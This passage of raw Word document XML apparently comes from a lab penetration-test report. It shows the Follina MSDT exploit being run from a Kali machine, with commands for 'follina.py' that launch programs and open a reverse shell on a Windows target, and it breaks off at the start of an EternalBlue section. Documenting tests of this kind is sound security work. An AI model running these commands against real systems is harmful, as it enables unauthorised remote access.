                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2236340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1809750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1803918" cy="317241"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="760259197" name="Rectangle 760259197"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1803918" cy="317241"/>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C376EB" id="Rectangle 760259197" o:spid="_x0000_s1026" style="position:absolute;margin-left:176.1pt;margin-top:142.5pt;width:142.05pt;height:25pt;z-index:251817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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74860888" wp14:editId="004F99C4">
            <wp:extent cx="5144278" cy="2199081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259189" name="Picture 760259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95">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="10399" b="21137"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5152852" cy="2202746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AAB429" w14:textId="65CC9EE7" w:rsidR="00AC65F0" w:rsidRDefault="00AC65F0" w:rsidP="00AC65F0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="338" w:name="_Toc111363641"/>
      <w:bookmarkStart w:id="339" w:name="_Toc111363778"/>
      <w:bookmarkStart w:id="340" w:name="_Toc111981803"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>78</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Connecting to the Python Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="338"/>
      <w:bookmarkEnd w:id="339"/>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p w14:paraId="0FFC64CD" w14:textId="77777777" w:rsidR="00AC65F0" w:rsidRPr="00AC65F0" w:rsidRDefault="00AC65F0" w:rsidP="00AC65F0"/>
    <w:p w14:paraId="5A39B318" w14:textId="461C6E42" w:rsidR="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00FE6E3A">
      <w:r>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:r w:rsidR="00FF4EFD">
        <w:t xml:space="preserve">the Word document has been </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">opened, the enable editing button needs to be enabled as outlined in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>79</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA21CF0" w14:textId="0123C310" w:rsidR="00FE6E3A" w:rsidRDefault="00A23F22" w:rsidP="00AC65F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A23F22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31136405" wp14:editId="4CCC929D">
            <wp:extent cx="4213860" cy="422910"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="15240"/>
            <wp:docPr id="21" name="Picture 2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 application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId96">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1747" t="8353" r="1602" b="71921"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4213860" cy="422910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="5B9BD5"/>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0673D26" w14:textId="1CE7BDB4" w:rsidR="00AC65F0" w:rsidRDefault="00AC65F0" w:rsidP="00AC65F0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc111363642"/>
      <w:bookmarkStart w:id="342" w:name="_Toc111363779"/>
      <w:bookmarkStart w:id="343" w:name="_Toc111981804"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>79</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Enable Editing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
      <w:bookmarkEnd w:id="342"/>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w14:paraId="0CE0303C" w14:textId="7CD8ACC0" w:rsidR="00AC65F0" w:rsidRDefault="00AC65F0" w:rsidP="00C263FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C64ECD9" w14:textId="6DE2AC26" w:rsidR="00FE6E3A" w:rsidRDefault="00BC66E8" w:rsidP="00FE6E3A">
      <w:r>
        <w:t xml:space="preserve">The result can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="00E76698">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where the calculator is opened at the same time as the MSDT trouble-shooter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB1005" w14:textId="1806CBED" w:rsidR="00BC66E8" w:rsidRDefault="00727297" w:rsidP="00BC66E8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251895808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57C9F825" wp14:editId="395B2604">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2079694</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1403882</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="879801" cy="341047"/>
                <wp:effectExtent l="0" t="0" r="15875" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="760259169" name="Rectangle 760259169"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="879801" cy="341047"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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2CA56B" id="Rectangle 760259169" o:spid="_x0000_s1026" style="position:absolute;margin-left:163.75pt;margin-top:110.55pt;width:69.3pt;height:26.85pt;z-index:251895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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251887616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="226FFA14" wp14:editId="0E2019A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1472925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>470775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="879801" cy="341047"/>
                <wp:effectExtent l="0" t="0" r="15875" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="760259168" name="Rectangle 760259168"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="879801" cy="341047"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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34365C" id="Rectangle 760259168" o:spid="_x0000_s1026" style="position:absolute;margin-left:116pt;margin-top:37.05pt;width:69.3pt;height:26.85pt;z-index:251887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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BC66E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EEDA2D7" wp14:editId="77D1719F">
            <wp:extent cx="3430376" cy="2891790"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="22860"/>
            <wp:docPr id="760259206" name="Picture 760259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97">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1425"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3440447" cy="2900280"/>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225BE3CC" w14:textId="5A4AC104" w:rsidR="00BC66E8" w:rsidRDefault="00BC66E8" w:rsidP="00BC66E8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc111363643"/>
      <w:bookmarkStart w:id="345" w:name="_Toc111363780"/>
      <w:bookmarkStart w:id="346" w:name="_Toc111981805"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>80</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Calculator opened</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
      <w:bookmarkEnd w:id="345"/>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p w14:paraId="04E139B8" w14:textId="5B7F3081" w:rsidR="006F7D2D" w:rsidRDefault="003043BD" w:rsidP="006F7D2D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidR="00BC66E8">
        <w:t xml:space="preserve"> the Kali attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00C263FF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BC66E8">
        <w:t xml:space="preserve"> the command </w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t xml:space="preserve">‘python3 follina.py -c “notepad.exe” </w:t>
      </w:r>
      <w:r w:rsidR="00BC66E8">
        <w:t xml:space="preserve">is entered as set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="00E76698">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00BC66E8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t xml:space="preserve"> By doing this </w:t>
      </w:r>
      <w:r w:rsidR="00727297">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t>otepad is opened instead of the calculator (figure 8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95533B" w14:textId="0B16AF43" w:rsidR="00BC66E8" w:rsidRPr="00BC66E8" w:rsidRDefault="006F7D2D" w:rsidP="003043BD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004E6054" wp14:editId="36FF0ACC">
            <wp:extent cx="2495567" cy="453134"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="760259210" name="Picture 760259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98">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="21118" t="69045" r="46771" b="23462"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2564042" cy="465567"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584F703" w14:textId="006E4AA5" w:rsidR="00034838" w:rsidRDefault="00BC66E8" w:rsidP="003043BD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="_Toc111363644"/>
      <w:bookmarkStart w:id="348" w:name="_Toc111363781"/>
      <w:bookmarkStart w:id="349" w:name="_Toc111981806"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>81</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Follina.py </w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t>Notepad Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
      <w:bookmarkEnd w:id="348"/>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p w14:paraId="1BAA5833" w14:textId="6692A278" w:rsidR="006F7D2D" w:rsidRDefault="006F7D2D" w:rsidP="003043BD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226FB4D4" w14:textId="57357A95" w:rsidR="006F7D2D" w:rsidRDefault="00727297" w:rsidP="003043BD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251905024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39AC898F" wp14:editId="37F2B44E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1685462</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>393374</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="603009" cy="316264"/>
                <wp:effectExtent l="0" t="0" r="26035" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="760259171" name="Rectangle 760259171"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="603009" cy="316264"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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5688B60" id="Rectangle 760259171" o:spid="_x0000_s1026" style="position:absolute;margin-left:132.7pt;margin-top:30.95pt;width:47.5pt;height:24.9pt;z-index:251905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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FFE519A" wp14:editId="24B0F92D">
            <wp:extent cx="2957975" cy="1936606"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="26035"/>
            <wp:docPr id="760259211" name="Picture 760259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99">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="773" t="777" r="8814"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2964381" cy="1940800"/>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1583E8D3" w14:textId="5724997E" w:rsidR="0021007F" w:rsidRDefault="003043BD" w:rsidP="003043BD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="350" w:name="_Toc111363645"/>
      <w:bookmarkStart w:id="351" w:name="_Toc111363782"/>
      <w:bookmarkStart w:id="352" w:name="_Toc111981807"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>82</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Notepad executed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
      <w:bookmarkEnd w:id="351"/>
      <w:bookmarkEnd w:id="352"/>
    </w:p>
    <w:p w14:paraId="7B2BB713" w14:textId="77777777" w:rsidR="003043BD" w:rsidRPr="003043BD" w:rsidRDefault="003043BD" w:rsidP="003043BD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D966127" w14:textId="4D7728D7" w:rsidR="006F7D2D" w:rsidRDefault="0036252E" w:rsidP="0036252E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t xml:space="preserve"> payload can be changed to a reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="003043BD">
        <w:t xml:space="preserve">using the command ‘python3 follina.py -r 9999’. The </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="003043BD">
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="003043BD">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t xml:space="preserve"> illustrated in figure</w:t>
      </w:r>
      <w:r w:rsidR="003043BD">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C263FF">
        <w:t xml:space="preserve"> demonstrates the connection</w:t>
      </w:r>
      <w:r w:rsidR="006F7D2D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166106C" w14:textId="4821C7D8" w:rsidR="003043BD" w:rsidRDefault="0036252E" w:rsidP="003043BD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251836416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52FC7C44" wp14:editId="1123CEAD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1297305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2590872</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1138418" cy="310829"/>
                <wp:effectExtent l="19050" t="19050" r="24130" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="760259216" name="Rectangle 760259216"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1138418" cy="310829"/>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48F491" id="Rectangle 760259216" o:spid="_x0000_s1026" style="position:absolute;margin-left:102.15pt;margin-top:204pt;width:89.65pt;height:24.45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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003043BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251827200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="209B8728" wp14:editId="144723D7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1321202</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1151777</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1817225" cy="166145"/>
                <wp:effectExtent l="19050" t="19050" r="12065" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="760259215" name="Rectangle 760259215"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1817225" cy="166145"/>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5A06D8F" id="Rectangle 760259215" o:spid="_x0000_s1026" style="position:absolute;margin-left:104.05pt;margin-top:90.7pt;width:143.1pt;height:13.1pt;z-index:251827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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003043BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA040C1" wp14:editId="514154FF">
            <wp:extent cx="3172017" cy="3211974"/>
            <wp:effectExtent l="0" t="0" r="9525" b="7620"/>
            <wp:docPr id="760259213" name="Picture 7602592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13" name="Picture 760259213" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId100">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="5421"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3184443" cy="3224556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790272D" w14:textId="2BEFFC7E" w:rsidR="003043BD" w:rsidRDefault="003043BD" w:rsidP="003043BD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="_Toc111363646"/>
      <w:bookmarkStart w:id="354" w:name="_Toc111363783"/>
      <w:bookmarkStart w:id="355" w:name="_Toc111981808"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>83</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Reverse Shell using Follina</w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
      <w:bookmarkEnd w:id="354"/>
      <w:bookmarkEnd w:id="355"/>
    </w:p>
    <w:p w14:paraId="0867923C" w14:textId="5A0C8CCC" w:rsidR="00D07277" w:rsidRDefault="001F4591" w:rsidP="00D07277">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="_Toc113190756"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00115BDD">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="00D07277" w:rsidRPr="00991450">
        <w:t xml:space="preserve"> End of Life</w:t>
      </w:r>
      <w:r w:rsidR="00115BDD">
        <w:t>: EternalBlue</w:t>
      </w:r>
      <w:r w:rsidR="00D07277" w:rsidRPr="00991450">
        <w:t xml:space="preserve"> – Severity Level 10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w14:paraId="763CD4D9" w14:textId="5182642D" w:rsidR="00D07277" w:rsidRDefault="00D07277" w:rsidP="0029310D">
      <w:r>
        <w:t xml:space="preserve">Using the Kali Linux as the testing machine an initial scan was made against the Windows </w:t>
      </w:r>
      <w:r w:rsidR="00504D6A">
        <w:t xml:space="preserve">target </w:t>
